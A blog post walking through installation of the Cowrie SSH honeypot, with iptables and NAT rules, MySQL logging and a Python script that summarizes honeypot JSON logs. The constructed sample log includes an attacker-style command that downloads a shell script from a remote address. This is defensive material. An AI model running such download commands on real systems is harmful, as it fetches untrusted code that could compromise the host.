7MS #176: DIY SSH Honeypot with Cowrie

Recently I covered the Kippo SSH honeypot (part 1 | part 2) and a few folks brought to my attention that this project was a little long in the tooth, and had been superseded by Cowrie.

This past weekend I got Cowrie installed on my Digital Ocean droplet. Below are the quick and dirty instructions I followed to get it running (basically an abbreviated version of the official INSTALL.md).

First, grab the pre-reqs:

sudo apt-get install python-twisted python-crypto python-pyasn1 python-gmpy2 python-zope.interface

Then add a user for Cowrie to run under:

sudo adduser --disabled-password cowrie

(Put in whatever you want for first name, last name etc.)

Change to the Cowrie user:

sudo su - cowrie

Download Cowrie:

git clone http://github.com/micheloosterhof/cowrie

Change to the dir you just made:

cd cowrie

Copy the general config file to an active one:

cp cowrie.cfg.dist cowrie.cfg

Edit it:

pico cowrie.cfg

All I did at this point was change my hostname to be something a bit more appetizing:

Hostname = mailserver

Important note: Cowrie listens on port 2222 by default. Below I'm going to show you how to create a NAT rule to forward requests destined for 22 to 2222, but if you'd rather "hard code" this, read the portion of the INSTALL.md that talks about using authbind for this purpose.

Exit to root user:

exit

Open /etc/ssh/sshd_config and change port 22 to some odd port you want to use for legit SSH management, like 9999 or 1357.

Reboot, and then for the next steps, I found it easier to connect directly to the Digitalocean.com SSH console, as we'll be tinkering with active iptables rules which may disconnect your existing SSH session.

First, list all your iptables rules (I find it easier to work with line numbers, so I add --line-numbers):

sudo iptables -L --line-numbers

Allow JUST yourself to SSH to the port for true system management. In this example I use port 6996:

sudo iptables -A INPUT -p tcp -s F.Q.D.N --dport 6996 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT

Next, ensure there's a rule set up to allow "anybody" to SSH in on port 22:

sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT

Also make sure there's a rule set up to allow "anybody" to hit port 2222, which is where Cowrie actually listens:

sudo iptables -A INPUT -p tcp --dport 2222 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT

Set up a NAT rule to get port 22 redirected to port 2222:

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

If you goof up like I did you can remove a NAT rule by listing existing NAT rules:

iptables -L -t nat --line-numbers

Then find the rule you want to nuke (let's say it's #3) and do this:

iptables -t nat -D PREROUTING 3

Make the iptables changes persistent by saving them to the file the iptables-persistent package loads at boot. Note that the redirect into /etc/iptables has to happen as root too, so if you're not already root, wrap the whole thing in sh -c rather than just prefixing sudo:

sudo sh -c 'iptables-save > /etc/iptables/rules.v4'

Change to Cowrie user, enter cowrie dir and start cowrie:

sudo su - cowrie

cd cowrie

./start.sh

From there, you're pretty much good to go with a default config. Here are some interesting files/folders to note:

  • dl - this folder has copies of files that "hackers" download during their session.

  • utils/playlog.py - plays back user sessions in an asciinema style presentation.
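Once the honeypot has run for a while you'll want more than a replay of single sessions. As an added example (not from the original post or the Cowrie project), here is a small Python script that summarizes login attempts, captured credentials, commands and downloads; it assumes Cowrie's JSON output (output_jsonlog in cowrie.cfg, writing log/cowrie.json) is enabled, and the sample log lines below are constructed.

```python
import json
from collections import Counter, defaultdict

# Constructed sample in the shape of Cowrie's JSON log; event/field names are Cowrie's, values are made up.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"a1","username":"root","password":"123456","timestamp":"2016-05-01T10:00:01Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"a1","username":"root","password":"admin","timestamp":"2016-05-01T10:00:02Z"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.7","session":"a1","username":"root","password":"password","timestamp":"2016-05-01T10:00:03Z"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","session":"a1","input":"wget http://203.0.113.9/x.sh","timestamp":"2016-05-01T10:00:05Z"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.7","session":"a1","url":"http://203.0.113.9/x.sh","outfile":"dl/deadbeef","shasum":"deadbeef","timestamp":"2016-05-01T10:00:06Z"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.55","session":"b2","username":"admin","password":"admin","timestamp":"2016-05-01T11:00:00Z"}
not json at all
"""

def parse_events(text):
    """Return one dict per well-formed JSON line; blank or damaged lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a half-written or truncated line must not abort the whole report
    return events

def summarize(events):
    """Aggregate what a defender looks at first: who tried, with what, and what they fetched."""
    report = {"attempts_by_ip": Counter(), "credentials": Counter(),
              "successes": [], "commands": defaultdict(list), "downloads": []}
    for ev in events:
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            report["attempts_by_ip"][ev["src_ip"]] += 1
            report["credentials"][(ev["username"], ev["password"])] += 1
            if eid == "cowrie.login.success":
                report["successes"].append((ev["src_ip"], ev["username"], ev["password"]))
        elif eid == "cowrie.command.input":
            report["commands"][ev["session"]].append(ev["input"])
        elif eid == "cowrie.session.file_download":
            report["downloads"].append((ev.get("url"), ev.get("shasum")))
    return report

if __name__ == "__main__":
    r = summarize(parse_events(SAMPLE_LOG))
    print("login attempts by source:", r["attempts_by_ip"].most_common())
    print("top credentials:", r["credentials"].most_common(3))
    print("downloads (url, sha256):", r["downloads"])
```

The shasum values line up with the file names in the dl folder, so the download list doubles as an index of what to submit to a sandbox or hash-lookup service.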

I also set up mysql integration using this site as a guide:

First, do a ./stop.sh (in same dir as start.sh) to stop Cowrie.

Next, do a mysql -u root -p to get connected to mysql, then:

CREATE DATABASE cowrie;

GRANT ALL ON cowrie.* TO cowrie@localhost IDENTIFIED BY 'some-awesome-password-you-pick';

exit

Then connect as the cowrie user from the cowrie folder and import the .sql file:

mysql -u cowrie -p

Provide your awesome password when prompted

USE cowrie;

source ./doc/sql/mysql.sql

exit

Now open cowrie.cfg and fill in the mysql section with the database, user and password you just created. Be sure to uncomment that whole chunk of lines or stuff doesn't work :-)

Finally, switch to Cowrie user, go to cowrie dir and fire it up!

sudo su - cowrie

cd cowrie

./start.sh